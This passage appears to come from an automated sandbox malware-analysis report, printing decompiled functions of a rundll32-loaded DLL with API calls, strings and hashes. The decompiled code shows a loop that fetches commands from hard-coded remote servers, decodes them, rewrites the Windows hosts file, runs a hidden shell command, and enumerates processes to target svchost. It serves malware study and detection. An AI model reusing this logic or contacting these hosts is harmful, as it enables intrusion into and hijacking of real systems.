						__eflags = _t90 % _t130;
						if(_t90 % _t130 == 0) {
							_t32 = _t110 + _t95;
							 *_t32 =  *(_t110 + _t95) + 0x4b;
							__eflags =  *_t32;
						} else {
							 *(_t110 + _t95) =  *(_t110 + _t95) + 0x3a;
						}
						_t110 = _t110 + 1;
						__eflags = _t110 - _v8;
					} while (_t110 < _v8);
					goto L16;
				}
			}

APIs

Sleep.KERNEL32(0000EA60), ref: 10006F35
LdrInitializeThunk.NTDLL ref: 10006F9C
LdrInitializeThunk.NTDLL ref: 10006FB3
Sleep.KERNEL32 ref: 1000706A
wsprintfA.USER32 ref: 100070AE
PrintFile.ABC(00000000,?,00000000), ref: 100070E7
PrintFile.ABC(00000000,?,00000000,?,00000000), ref: 100070FA

Strings

QVlSVFNydi5heWU=, xrefs: 10006F0B
http://107.163.56.232:18963/main.php, xrefs: 10007018
XGRyaXZlcnNcZXRjXGhvc3Rz, xrefs: 10006F8A
XGRyaXZlcnNcZXRjXGhvc3RzLmljcw==, xrefs: 10006FA1
iOffset, xrefs: 10007053
QVNEU3ZjLmV4ZQ==, xrefs: 10006EFF
c:\1.txt, xrefs: 10007058

Memory Dump Source

Source File: 00000012.00000002.289402853.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000012.00000002.289398538.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000012.00000002.289411544.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000012.00000002.289417468.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000012.00000002.289423101.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000012.00000002.289442215.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000012.00000002.289452058.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_10000000_rundll32.jbxd

Similarity

API ID: FileInitializePrintSleepThunk$wsprintf
String ID: QVNEU3ZjLmV4ZQ==$QVlSVFNydi5heWU=$XGRyaXZlcnNcZXRjXGhvc3Rz$XGRyaXZlcnNcZXRjXGhvc3RzLmljcw==$c:\1.txt$http://107.163.56.232:18963/main.php$iOffset
API String ID: 983772623-1685166179
Opcode ID: 5de879edd54ecaa5dde90807be5e49734b878345bfb175a52f25740afad77bc0
Instruction ID: 3d380b1aca1ede5b104bd14f8e69b562dc8f53a9395fdf47d07c0f5b95106c5e
Opcode Fuzzy Hash: 5de879edd54ecaa5dde90807be5e49734b878345bfb175a52f25740afad77bc0
Instruction Fuzzy Hash: 2651C8B6D04359AAFB21D774CC45FCF77ACEF08381F2045A6F208E6086DA75AB848E55

Uniqueness

Uniqueness Score: -1.00%

Function 10004D36 Relevance: 17.8, APIs: 3, Strings: 7, Instructions: 308
COMMON

Download Yara Rule

C-Code - Quality: 39%

			E10004D36(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				void* _t98;
				intOrPtr* _t102;
				intOrPtr _t103;
				void* _t104;
				intOrPtr* _t111;
				intOrPtr* _t113;
				intOrPtr* _t114;
				intOrPtr* _t121;
				intOrPtr* _t123;
				intOrPtr* _t125;
				intOrPtr* _t127;
				intOrPtr* _t139;
				intOrPtr* _t141;
				intOrPtr* _t143;
				intOrPtr* _t145;
				void* _t146;
				void* _t148;
				intOrPtr* _t150;
				void* _t151;
				void* _t153;
				intOrPtr* _t163;
				signed int _t165;
				intOrPtr _t173;
				void* _t206;
				void* _t214;
				void* _t215;
				intOrPtr _t216;
				intOrPtr* _t217;
				intOrPtr* _t219;
				void* _t220;
				void* _t222;
				void* _t223;
				void* _t225;

				_t245 = __fp0;
				_t227 = __eflags;
				_t202 = __edi;
				_t161 = __ecx;
				E1000CDA0(__ebx, __ecx, __edx, __edi, __esi, __eflags);
				E1000CD20(0x182c, __ecx);
				 *((intOrPtr*)(_t220 - 0x20)) = 0;
				_t98 = E1000CCFC(0, _t161, __esi, _t220, _t227, _t220 - 0x48);
				_t223 = _t222 + 0xc;
				0x1003a410(0, 0, 0, 0, 0x10, __edi, __esi, __ebx);
				E1002D3DC(_t98, 0, _t161, __edx, __edi, __esi, _t227, _t220, 0, 0xffffffff, 0, 0, 0);
				 *((intOrPtr*)(_t220 - 0x1c)) = 0;
				0x100411b4(E100101A8, 0, 1, E100100D8, _t220 - 0x1c, 3, 0, 0, 0);
				_push(cs);
				_push( *((intOrPtr*)(_t220 + 8)));
				 *((intOrPtr*)(_t220 - 0x18)) = 0;
				_t102 =  *((intOrPtr*)(E100050A1(0, _t220 + 8, __edx, _t202, __esi, _t227, __fp0)));
				 *(_t220 - 4) = 0;
				if(_t102 == 0) {
					_t103 = 0;
					__eflags = 0;
				} else {
					_t103 =  *_t102;
				}
				_t163 =  *((intOrPtr*)(_t220 - 0x1c));
				_t214 = _t220 - 0x18;
				_t198 =  *_t163;
				_t104 =  *((intOrPtr*)( *_t163 + 0xc))(_t163, _t103, 0, 0, 0, 0, 0, 0, _t214);
				_t164 =  *((intOrPtr*)(_t220 + 8));
				 *(_t220 - 4) =  *(_t220 - 4) | 0xffffffff;
				_t229 =  *((intOrPtr*)(_t220 + 8));
				if( *((intOrPtr*)(_t220 + 8)) != 0) {
					E1000515C(_t104, _t164);
				}
				0x1003ed69(_t214,  *((intOrPtr*)(_t220 - 0x18)), 0xa, 0, 0, 3, 3, 0, 0);
				_t215 = L"SELECT * FROM ";
				_t165 = 7;
				memcpy(_t220 - 0x838, _t215, _t165 << 2);
				asm("movsw");
				_t206 = _t220 - 0x81a;
				memset(_t206, 0, 0x1ec << 2);
				_t225 = _t223 + 0x18;
				_t207 = _t206 + 0x1ec;
				asm("stosw");
				 *((intOrPtr*)(_t220 - 0x10)) = 0;
				0x1003bb02(_t215, _t220 - 0x838,  *((intOrPtr*)(_t220 + 0xc)));
				_push(_t220 - 0x838);
				_t111 =  *((intOrPtr*)(E100050A1(0, _t220 - 0x28, _t198, _t206 + 0x1ec, _t215, _t229, _t245)));
				 *(_t220 - 4) = 1;
				_t230 = _t111;
				if(_t111 == 0) {
					_t216 = 0;
					__eflags = 0;
				} else {
					_t216 =  *_t111;
				}
				_push("WQL");
				_t113 =  *((intOrPtr*)(E1000504D(0, _t220 + 8, _t198, _t207, _t216, _t230, _t245)));
				 *(_t220 - 4) = 2;
				if(_t113 == 0) {
					_t173 = 0;
					__eflags = 0;
				} else {
					_t173 =  *_t113;
				}
				_t114 =  *((intOrPtr*)(_t220 - 0x18));
				_t199 =  *_t114;
				_t115 =  *((intOrPtr*)( *_t114 + 0x50))(_t114, _t173, _t216, 0x30, 0, _t220 - 0x10);
				_t174 =  *((intOrPtr*)(_t220 + 8));
				if( *((intOrPtr*)(_t220 + 8)) != 0) {
					_t115 = E1000515C(_t115, _t174);
					 *((intOrPtr*)(_t220 + 8)) = 0;
				}
				_t175 =  *((intOrPtr*)(_t220 - 0x28));
				 *(_t220 - 4) =  *(_t220 - 4) | 0xffffffff;
				if( *((intOrPtr*)(_t220 - 0x28)) != 0) {
					_t115 = E1000515C(_t115, _t175);
				}
				 *((intOrPtr*)(_t220 - 0x24)) = 0;
				if( *((intOrPtr*)(_t220 - 0x10)) == 0) {
					L32:
					_pop(_t217);
					E10025EA7(_t115, 0, _t175, _t199, _t217, _t220, _t243);
					 *_t217(_t220 - 0x48);
					 *_t217(_t220 - 0x38);
					_t121 =  *((intOrPtr*)(_t220 - 0x18));
					 *((intOrPtr*)( *_t121 + 8))(_t121);
					_t123 =  *((intOrPtr*)(_t220 - 0x1c));
					 *((intOrPtr*)( *_t123 + 8))(_t123);
					_t125 =  *((intOrPtr*)(_t220 - 0x10));
					 *((intOrPtr*)( *_t125 + 8))(_t125);
					_t127 =  *((intOrPtr*)(_t220 - 0x14));
					E10026ED3( *((intOrPtr*)( *_t127 + 8))(_t127), 0,  *_t127, _t199, _t217, _t243);
					 *[fs:0x0] =  *((intOrPtr*)(_t220 - 0xc));
					return  *((intOrPtr*)(_t220 - 0x20));
				} else {
					_t219 =  *0x1000e230;
					while(1) {
						_push(_t220 - 0x24);
						_t175 = _t220 - 0x14;
						_push(_t220 - 0x14);
						_push(1);
						_push(0xffffffff);
						_push( *((intOrPtr*)(_t220 - 0x10)));
						if( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t220 - 0x10)))) + 0x10))() != 0) {
							goto L32;
						}
						 *_t219(_t220 - 0x48);
						 *_t219(_t220 - 0x38);
						 *_t219(_t220 - 0x68);
						_t139 =  *((intOrPtr*)(_t220 - 0x14));
						 *((intOrPtr*)(_t220 - 0x30)) = 0;
						 *((intOrPtr*)( *_t139 + 0x10))(_t139, L"Name", 0, _t220 - 0x48, 0, 0);
						_t141 =  *((intOrPtr*)(_t220 - 0x14));
						 *((intOrPtr*)( *_t141 + 0x10))(_t141, L"CommandLine", 0, _t220 - 0x38, 0, 0);
						_t143 =  *((intOrPtr*)(_t220 - 0x14));
						_t199 = _t220 - 0x68;
						_t175 =  *_t143;
						_t115 =  *((intOrPtr*)( *_t143 + 0x10))(_t143, L"ProcessID", 0, _t220 - 0x68, 0, 0);
						_t236 =  *((intOrPtr*)(_t220 - 0x30));
						if( *((intOrPtr*)(_t220 - 0x30)) != 0) {
							 *(_t220 - 0x58) = 0;
							_push( *((intOrPtr*)(_t220 - 0x40)));
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosw");
							asm("stosb");
							_t145 = E100050A1(0, _t220 + 8, _t199, _t220 - 0x57, _t219, _t236, _t245);
							_t186 =  *_t145;
							 *(_t220 - 4) = 3;
							if( *_t145 == 0) {
								_t146 = 0;
								__eflags = 0;
							} else {
								_t146 = E10005189(_t186, _t199, _t245);
							}
							_push(_t146);
							_t148 = E1000CD0E(_t186, _t220 - 0x58);
							 *(_t220 - 4) =  *(_t220 - 4) | 0xffffffff;
							_t189 =  *((intOrPtr*)(_t220 + 8));
							if( *((intOrPtr*)(_t220 + 8)) != 0) {
								E1000515C(_t148, _t189);
								 *((intOrPtr*)(_t220 + 8)) = 0;
							}
							_t115 = _t220 - 0x58;
							0x10033fcb(_t115, "svchost.exe");
							_t239 = _t115;
							_t175 = _t219;
							if(_t115 == 0) {
								 *((char*)(_t220 - 0x1838)) = 0;
								_push( *((intOrPtr*)(_t220 - 0x30)));
								memset(_t220 - 0x1837, _t115, 0x3ff << 2);
								_t225 = _t225 + 0xc;
								asm("stosw");
								asm("stosb");
								_t150 = E100050A1(0, _t220 + 0xc, _t199, _t220 - 0x1837 + 0x3ff, _t219, _t239, _t245);
								_t194 =  *_t150;
								 *(_t220 - 4) = 4;
								if( *_t150 == 0) {
									_t151 = 0;
									__eflags = 0;
								} else {
									_t151 = E10005189(_t194, _t199, _t245);
								}
								_push(_t151);
								_t153 = E1000CD0E(_t194, _t220 - 0x1838);
								 *(_t220 - 4) =  *(_t220 - 4) | 0xffffffff;
								_t175 =  *((intOrPtr*)(_t220 + 0xc));
								if( *((intOrPtr*)(_t220 + 0xc)) != 0) {
									E1000515C(_t153, _t175);
									 *((intOrPtr*)(_t220 + 0xc)) = 0;
								}
								0x10035299(_t220 - 0x1838, "svchost.exe -k NetworkService");
								asm("fild dword [ebp-0x74f98b40]");
								_t220 = _t220 + 1;
								_t115 =  *0x39e04589;
							}
						}
						_t243 =  *((intOrPtr*)(_t220 - 0x10));
						if( *((intOrPtr*)(_t220 - 0x10)) != 0) {
							continue;
						} else {
							goto L32;
						}
					}
					goto L32;
				}
			}

APIs

VariantInit.OLEAUT32(00000000), ref: 10004EC5
VariantInit.OLEAUT32(?), ref: 10004ECB
VariantInit.OLEAUT32(000000FF), ref: 10004ED1

Strings

CommandLine, xrefs: 10004EF7
svchost.exe -k NetworkService, xrefs: 10004FE0
svchost.exe, xrefs: 10004F6F
Name, xrefs: 10004EE2
ProcessID, xrefs: 10004F0C
SELECT * FROM , xrefs: 10004DEA, 10004E18
WQL, xrefs: 10004E42

Memory Dump Source

Source File: 00000012.00000002.289402853.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000012.00000002.289398538.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000012.00000002.289411544.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000012.00000002.289417468.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000012.00000002.289423101.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000012.00000002.289442215.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000012.00000002.289452058.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_10000000_rundll32.jbxd

Similarity

API ID: InitVariant
String ID: CommandLine$Name$ProcessID$SELECT * FROM $WQL$svchost.exe$svchost.exe -k NetworkService
API String ID: 1927566239-2685825574
Opcode ID: fd588900a5363513c1f1dd2de060abe9b8d833deba3cdd76d1d7d507bcde8816
Instruction ID: 685215bc3e39be9e7018d3cf9a0ce008db6110164ca837be315af6ad884bf42e
Opcode Fuzzy Hash: fd588900a5363513c1f1dd2de060abe9b8d833deba3cdd76d1d7d507bcde8816
Instruction Fuzzy Hash: 7AA15BB5900209AFEB04DF94CC81DEEBBBCEF48394F104569F615AB295CB31AE45CB60

Uniqueness

Uniqueness Score: -1.00%

Function 1000827D Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 145
librarysleepCOMMON

Download Yara Rule

C-Code - Quality: 41%

			E1000827D() {
				signed int _v8;
				void _v267;
				signed char _v268;
				void _v527;
				signed char _v528;
				char _v783;
				signed char _v784;
				void _v1807;
				signed char _v1808;
				void* _t50;
				void* _t56;
				signed int _t61;
				signed int _t67;
				void* _t70;
				void* _t71;
				signed int _t72;
				void* _t78;
				void* _t81;
				signed int _t82;
				void* _t83;
				void* _t94;
				signed int _t95;
				intOrPtr* _t96;
				void* _t98;
				void* _t99;
				void* _t102;
				void* _t104;
				void* _t109;

				_v268 = _v268 & 0x00000000;
				_t72 = 0x40;
				memset( &_v267, 0, _t72 << 2);
				_v528 = _v528 & 0x00000000;
				asm("stosw");
				asm("stosb");
				memset( &_v527, E1002ED85(_t96, _t98), 0 << 2);
				asm("stosw");
				asm("stosb");
				 *_t96( &_v268, 0x104, _t98, 0x40);
				 *_t96( &_v528, 0x104);
				_push(E10001000(0, 0, _t109, "XGRyaXZlcnNcZXRjXGhvc3Rz"));
				E1000CD08(0,  &_v268);
				_push(E10001000(0, 0, _t109, "XGRyaXZlcnNcZXRjXGhvc3RzLmljcw=="));
				_t50 = E1000CCAE(E1000CD08(0,  &_v528), _t70, 0, _t86, 0x104, 0x80000, _t98, 0, _t109, 0x80000);
				_t102 = _t99 + 0x34;
				_t71 = _t50;
				while(1) {
					_v1808 = _v1808 & 0x00000000;
					memset( &_v1807, 0, 0xff << 2);
					_v784 = _v784 & 0x00000000;
					asm("stosw");
					asm("stosb");
					_t78 = 0x3f;
					_t94 =  &_v783;
					memset(_t94, 0, 0 << 2);
					_t104 = _t102 + 0x18;
					_t95 = _t94 + _t78;
					asm("stosw");
					asm("stosb");
					_t56 = E10005C4C( &_v784, 0x100);
					_t107 = _t56;
					_pop(_t81);
					if(_t56 == 0) {
						_push("http://107.163.56.232:18963/main.php");
					} else {
						_push( &_v784);
					}
					_push("%s");
					_push( &_v1808);
					E10003EF4();
					_push(0x80000);
					_push(0);
					E1000CCFC(_t71, _t81, 0x80000, _t98, _t107, _t71);
					_t61 = E100061BD(_t81, 0x80000, _t107, _t109,  &_v1808, _t71, 0x80000);
					_t102 = _t104 + 0x24;
					_v8 = _t61;
					if(_t61 > 7) {
						goto L6;
					}
					L5:
					Sleep( *0x10012500);
					continue;
					L6:
					_t82 = 0;
					__eflags = _t61;
					if(_t61 <= 0) {
						L11:
						__eflags = E1000CD02(_t82, 0x80000) - 0x10;
						_t83 = _t71;
						if(__eflags <= 0) {
							_t95 = 0x10016ae0;
							_push(_t71);
							__eflags = E1000CDF2(0x80000);
							_t83 = 0x10016ae0;
							if(__eflags != 0) {
								wsprintfA(0x10016ae0, "%s", _t71);
								_t102 = _t102 + 0xc;
							}
						}
						E1000721F(_t71, _t83, _t86, _t95, 0x80000, __eflags, _t109);
						_t102 = _t102 + 0xc;
						0x1004303b(0x80000, E10001000(_t83, __eflags, _t109, "Y21kLmV4ZSAvYyBpcGNvbmZpZyAvZmx1c2hkbnM="), 0, 0, "127.0.0.1", "8.8.8.8");
						goto L5;
					} else {
						goto L7;
					}
					do {
						L7:
						_t67 = _t82;
						asm("cdq");
						_t95 = 2;
						_t86 = _t67 % _t95;
						__eflags = _t67 % _t95;
						if(_t67 % _t95 == 0) {
							_t32 = _t82 + _t71;
							 *_t32 =  *(_t82 + _t71) + 0x4b;
							__eflags =  *_t32;
						} else {
							 *(_t82 + _t71) =  *(_t82 + _t71) + 0x3a;
						}
						_t82 = _t82 + 1;
						__eflags = _t82 - _v8;
					} while (_t82 < _v8);
					goto L11;
				}
			}

APIs

LdrInitializeThunk.NTDLL ref: 100082E8
LdrInitializeThunk.NTDLL ref: 100082FF
Sleep.KERNEL32(00080000,00000000,00000000), ref: 100083A5
wsprintfA.USER32 ref: 100083F7

Strings

http://107.163.56.232:18963/main.php, xrefs: 10008364
Y21kLmV4ZSAvYyBpcGNvbmZpZyAvZmx1c2hkbnM=, xrefs: 10008416
8.8.8.8, xrefs: 10008400
XGRyaXZlcnNcZXRjXGhvc3Rz, xrefs: 100082D6
XGRyaXZlcnNcZXRjXGhvc3RzLmljcw==, xrefs: 100082ED
127.0.0.1, xrefs: 10008405

Memory Dump Source

Source File: 00000012.00000002.289402853.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000012.00000002.289398538.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000012.00000002.289411544.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000012.00000002.289417468.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000012.00000002.289423101.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000012.00000002.289442215.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000012.00000002.289452058.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_10000000_rundll32.jbxd

Similarity

API ID: InitializeThunk$Sleepwsprintf
String ID: 127.0.0.1$8.8.8.8$XGRyaXZlcnNcZXRjXGhvc3Rz$XGRyaXZlcnNcZXRjXGhvc3RzLmljcw==$Y21kLmV4ZSAvYyBpcGNvbmZpZyAvZmx1c2hkbnM=$http://107.163.56.232:18963/main.php
API String ID: 2795264321-515792873
Opcode ID: dd95a7da35bc16e265faba6e3e4d4fb2f7900b585253cfcdefab1353bf6a680d
Instruction ID: 307e7fa5ef9b1f310a37dbdaab843115ee1a86e3901deb50f67a69e2b05b1656
Opcode Fuzzy Hash: dd95a7da35bc16e265faba6e3e4d4fb2f7900b585253cfcdefab1353bf6a680d
Instruction Fuzzy Hash: 394106B6D042597AF721D364CC46FCB7B6CEB443C0F2040A5F248B9086DAB4BB858F55

Uniqueness

Uniqueness Score: -1.00%

Function 1000570F Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 103
filethreadCOMMON

Download Yara Rule

C-Code - Quality: 56%

			E1000570F(void* __ecx, void* __edx, void* __eflags, void* __fp0) {
				void _v67;
				char _v68;
				void _v327;
				char _v328;
				char _v587;
				char _v588;
				void _v4683;
				signed char _v4684;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t47;
				void* _t48;
				void* _t49;
				signed int _t52;
				signed int _t56;
				void* _t58;
				void* _t67;
				void* _t71;
				void* _t79;

				_t79 = __eflags;
				_t60 = __edx;
				_t51 = __ecx;
				E1000CD20(0x1248, __ecx);
				E100051D3(_t51, __edx, _t79, __fp0);
				_v68 = _v68 & 0x00000000;
				_t52 = 0xf;
				memset( &_v67, 0, _t52 << 2);
				asm("stosw");
				asm("stosb");
				wsprintfA( &_v68, "%s\\%s", 0x100165a4, 0x100165a8);
				_v4684 = _v4684 & 0x00000000;
				memset( &_v4683, 0, 0x3ff << 2);
				asm("stosw");
				asm("stosb");
				E10005318(0, _t79,  &_v4684);
				_v328 = _v328 & 0x00000000;
				_t56 = 0x40;
				_v588 = _v588 & 0x00000000;
				memset( &_v327, 0, _t56 << 2);
				asm("stosw");
				asm("stosb");
				_t58 = 0x40;
				_t67 =  &_v587;
				memset(_t67, 0, 0 << 2);
				_t68 = _t67 + _t58;
				asm("stosw");
				asm("stosb");
				wsprintfA( &_v328, "c:\\windows\\system32\\drivers\\%s", 0x100165a4);
				wsprintfA( &_v588, "c:\\windows\\system32\\drivers\\%s\\%s", 0x100165a4, 0x100165a8);
				0x10038f08( &_v328, 0);
				asm("insd");
				E1000443D( &_v4684, 0x100165a4, 0, _t60,  &_v4684,  &_v588);
				_push(L"Win32_process");
				_push(L"ROOT\\CIMv2");
				 *0x10015fd4 = 0;
				_t47 = E10004D36(0x100165a4, 0, _t60, _t67 + _t58, 0, _t79, __fp0);
				_t80 = _t47;
				if(_t47 != 0) {
					_push(_t47);
					_push(0);
					_t47 = E10029564(_t47, _t60, _t68, _t80, _t71, 0x1f0fff);
					 *0x10015ff4 = _t47;
					if(_t47 != 0) {
						_t48 =  *0x10015fd8; // 0x0
						 *_t48 = 0;
						_t49 = CreateThread(0, 0, E10005620,  *0x10015fd8, 0, 0);
						 *0x10015fd4 =  *0x10015fd4 + 1;
						return _t49;
					}
				}
				return _t47;
			}

APIs

wsprintfA.USER32 ref: 1000574F

Part of subcall function 10005318: LdrInitializeThunk.NTDLL ref: 1000537D
Part of subcall function 10005318: LdrInitializeThunk.NTDLL ref: 1000538A
Part of subcall function 10005318: LdrInitializeThunk.NTDLL ref: 10005393
Part of subcall function 10005318: LdrInitializeThunk.NTDLL ref: 100053A0

wsprintfA.USER32 ref: 100057B1
wsprintfA.USER32 ref: 100057C5
PrintFile.ABC(?,?,?,00000000,?,?,?,?,?,?,?,10016AE0,00000000,00080000,?,1000721D), ref: 100057E8
CreateThread.KERNEL32(00000000,00000000,10005620,00000000,00000000), ref: 10005835

Strings

%s\%s, xrefs: 10005749
Win32_process, xrefs: 100057ED
ROOT\CIMv2, xrefs: 100057F2
c:\windows\system32\drivers\%s\%s, xrefs: 100057BF
c:\windows\system32\drivers\%s, xrefs: 100057AB

Memory Dump Source

Source File: 00000012.00000002.289402853.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000012.00000002.289398538.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000012.00000002.289411544.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000012.00000002.289417468.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000012.00000002.289423101.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000012.00000002.289442215.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000012.00000002.289452058.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_10000000_rundll32.jbxd

Similarity

API ID: InitializeThunk$wsprintf$CreateFilePrintThread
String ID: %s\%s$ROOT\CIMv2$Win32_process$c:\windows\system32\drivers\%s$c:\windows\system32\drivers\%s\%s
API String ID: 2056782399-1421401311
Opcode ID: 1fc3a60c804705b70d8d56d30513bd553668347857bff2fbb54fbee7dccb5b5f
Instruction ID: e048b07faf1ac040a4fa8706c71f0fbcae81103e39d27b5d28515d44bb65aaec
Opcode Fuzzy Hash: 1fc3a60c804705b70d8d56d30513bd553668347857bff2fbb54fbee7dccb5b5f
Instruction Fuzzy Hash: ED31A773910238BBEB21D7A4CC44FCF7B6DEB08746F1405A2F708FA051DB71AA858A91

Uniqueness

Uniqueness Score: -1.00%

Function 10005989 Relevance: 15.1, APIs: 4, Strings: 6, Instructions: 80
COMMON

Download Yara Rule

C-Code - Quality: 33%

			E10005989(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* __ebp, void* __eflags, void* __fp0, intOrPtr _a16, intOrPtr _a20, signed int _a28) {
				intOrPtr _t17;
				void* _t20;
				intOrPtr* _t39;

				_t50 = __eflags;
				_t32 = __edx;
				_t27 = __ecx;
				E1000CDA0(__ebx, __ecx, __edx, __edi, __esi, __eflags);
				_push(__ecx);
				_push(__ebx);
				_push(__ebp);
				_push(__esi);
				_push(__edi);
				wsprintfA(0x100165b0, "%s", "12071239");
				0x10031e13();
				 *_t34(0, 0x100165c8, 0x104);
				 *_t34( *0x10016adc, 0x100166cc, 0x104);
				E1000CD0E(_t27, 0x100167d0);
				0x100426e9(0x100166cc);
				asm("arpl [eax+0x57530020], ax");
				wsprintfA(0x100168d4, "%s\\%s", 0x100167d0, 0x5c);
				wsprintfA(0x100169d8, "%s\\version.txt", 0x100167d0);
				_t17 = E1000CCAE(wsprintfA("F896SD5DAE", "M%s", "107.163.56.251:6658"), "12071239", _t27, _t32, 0x100167d0,  *0x1000e248, 0x100166cc, _t50, __fp0, 0x84);
				_a16 = _t17;
				_a28 = _a28 & 0x00000000;
				_t51 = _t17;
				if(_t17 == 0) {
					_t39 = 0;
					__eflags = 0;
				} else {
					_t27 = _t17;
					_t39 = E10008A6A("12071239", _t17, _t32, _t51, __fp0);
				}
				_a28 = _a28 | 0xffffffff;
				_t6 = _t39 + 0x44; // 0x44
				E1000CD0E(_t27, 0x10016af0);
				if(_t39 != 0) {
					 *((intOrPtr*)( *_t39))(1);
				}
				_t20 = 1;
				 *[fs:0x0] = _a20;
				return _t20;
			}

APIs

wsprintfA.USER32 ref: 100059AE
wsprintfA.USER32 ref: 100059FB
wsprintfA.USER32 ref: 10005A08
wsprintfA.USER32 ref: 10005A19

Strings

%s\version.txt, xrefs: 100059FE
%s\%s, xrefs: 100059F1
F896SD5DAE, xrefs: 10005A14
107.163.56.251:6658, xrefs: 10005A0A
M%s, xrefs: 10005A0F
12071239, xrefs: 1000599D, 100059A3

Memory Dump Source

Source File: 00000012.00000002.289402853.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000012.00000002.289398538.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000012.00000002.289411544.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000012.00000002.289417468.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000012.00000002.289423101.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000012.00000002.289442215.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000012.00000002.289452058.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_10000000_rundll32.jbxd

Similarity

API ID: wsprintf
String ID: %s\%s$%s\version.txt$107.163.56.251:6658$12071239$F896SD5DAE$M%s
API String ID: 2111968516-4006945637
Opcode ID: c285b52f04845b3a5ddf97e236d1c823dd400fbe2074583f7b88738120a81b70
Instruction ID: 79abf1e2baf1fb729ca166858087dd68efaefcd5263c4161144b64841660d7f9
Opcode Fuzzy Hash: c285b52f04845b3a5ddf97e236d1c823dd400fbe2074583f7b88738120a81b70
Instruction Fuzzy Hash: 741136366003287BF210E7959C45F6F7F5CDF896A6F01412AF700AE181DB72E8808B66

Uniqueness

Uniqueness Score: -1.00%

Function 1000600F Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 97libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 100060BB
LdrInitializeThunk.NTDLL ref: 100060CE
LdrInitializeThunk.NTDLL ref: 100060DB

Strings

WinSta0\Default, xrefs: 100060EF
wininet.dll, xrefs: 10006028
URLDownloadToCacheFileA, xrefs: 10006052
urlmon.dll, xrefs: 10006021
GetUrlCacheEntryInfoA, xrefs: 1000605D

Memory Dump Source

Source File: 00000012.00000002.289402853.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000012.00000002.289398538.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000012.00000002.289411544.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000012.00000002.289417468.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000012.00000002.289423101.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000012.00000002.289442215.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000012.00000002.289452058.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_10000000_rundll32.jbxd

Similarity

API ID: InitializeThunk
String ID: GetUrlCacheEntryInfoA$URLDownloadToCacheFileA$WinSta0\Default$urlmon.dll$wininet.dll
API String ID: 2994545307-1569318151
Opcode ID: 6495203b3a7a723168cc2296d43cec07435a7eea9f24a85f0b27764c02e7c442
Instruction ID: 60b119b73ed59b85f20aa855cf1e8ee1c5a7c8f5b848a72e73bb8641c22c9667
Opcode Fuzzy Hash: 6495203b3a7a723168cc2296d43cec07435a7eea9f24a85f0b27764c02e7c442
Instruction Fuzzy Hash: 8C316FB690065CBAEB11DBA4CC45FDF7F7DEF08341F4400A6F208AA181E7316A458EA4

Uniqueness

